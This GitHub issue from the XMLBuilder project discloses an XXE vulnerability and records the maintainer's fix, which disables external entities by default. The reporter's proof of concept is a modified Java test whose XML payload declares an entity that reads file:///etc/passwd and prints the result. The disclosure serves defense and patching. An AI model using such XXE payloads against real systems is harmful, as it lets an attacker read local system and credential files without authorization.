Skip to content
New issue

Have a question about this project? # for a free GitHub account to open an issue and contact its maintainers and the community.

#

By clicking “#”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? # to your account

Jump to bottom

XMLBuilder2 is vulnerable to XML External Entity (XXE) injection #6

Closed
xiaoyongwu opened this issue Jul 22, 2014 · 1 comment
Closed

XMLBuilder2 is vulnerable to XML External Entity (XXE) injection #6

xiaoyongwu opened this issue Jul 22, 2014 · 1 comment

Comments

@xiaoyongwu
Copy link

I noticed that by default, the parser in XMLBuilder is vulnerable to XXE.
The following PoC is a modified version of the TestXMLBuilder2.java file that would see the local file included in parser output.

package com.jamesmurty.utils;

import javax.xml.xpath.XPathConstants;
import javax.xml.xpath.XPathExpressionException;

public class TestXMLBuilder2 extends BaseXMLBuilderTests {

public static final String EXAMPLE_XML_DOC2 = "<?xml version=\"1.0\"?><!DOCTYPE Projects [ <!ELEMENT JetS3t ANY> <!ENTITY xx1 SYSTEM \"file:///etc/passwd\"> ]>" + EXAMPLE_XML_DOC_START + "&xx1;" + EXAMPLE_XML_DOC_END;

@Override
public Class<? extends BaseXMLBuilder> XMLBuilderToTest() throws Exception {
    return XMLBuilder2.class;
}

@Override
protected boolean isRuntimeExceptionsOnly() {
    return true;
}

// NOTE: No checked exceptions for API calls made in this test method
public void testNoCheckedExceptions() {
    XMLBuilder2 builder = XMLBuilder2.create("Blah");
    builder = XMLBuilder2.parse(EXAMPLE_XML_DOC2);
    builder.stripWhitespaceOnlyTextNodes();
    builder.asString();
    builder.elementAsString();
    builder.xpathQuery("/*", XPathConstants.NODESET);
    builder = builder.xpathFind("/Projects");
    System.out.println(builder.getElement().getTextContent());
}

public void testExceptionWrappedInXMLBuilderRuntimeException() {
    XMLBuilder2 builder = XMLBuilder2.parse(EXAMPLE_XML_DOC2);
    try {
        builder.xpathFind("/BadPath");
        fail("Expected XMLBuilderRuntimeException");
    } catch (XMLBuilderRuntimeException e) {
        assertEquals(XMLBuilderRuntimeException.class, e.getClass());
        Throwable cause = e.getCause();
        assertEquals(XPathExpressionException.class, cause.getClass());
        assertTrue(cause.getMessage().contains("does not resolve to an Element"));
    }
}

}
jmurty added a commit that referenced this issue Jul 22, 2014
@jmurty
Disable external entities by default to prevent XXE injection attacks…
e6fddca 
…, re #6

XML Builder classes now explicitly enable or disable
'external-general-entities' and 'external-parameter-entities' features
of the DocumentBuilderFactory when #create or #parse methods are used.

To prevent XML External Entity (XXE) injection attacks, these features
are disabled by default. They can only be enabled by passing a true
boolean value to new versions of the #create and #parse methods that
accept a flag for this feature.
@jmurty
Copy link
Owner

jmurty commented Jul 22, 2014

@xiaoyongwu Thanks for the report. This XXE vulnerability is now fixed by disabling external entity processing by default; external entities are now only processed if this feature is explicitly enabled in a call to the #create or #parse methods.

@jmurty jmurty closed this as completed Jul 22, 2014
@jmurty jmurty reopened this Jul 22, 2014
@jmurty jmurty closed this as completed Jul 22, 2014
@mpaine-act mpaine-act mentioned this issue Dec 19, 2023
Closed
# for free to join this conversation on GitHub. Already have an account? # to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@jmurty @xiaoyongwu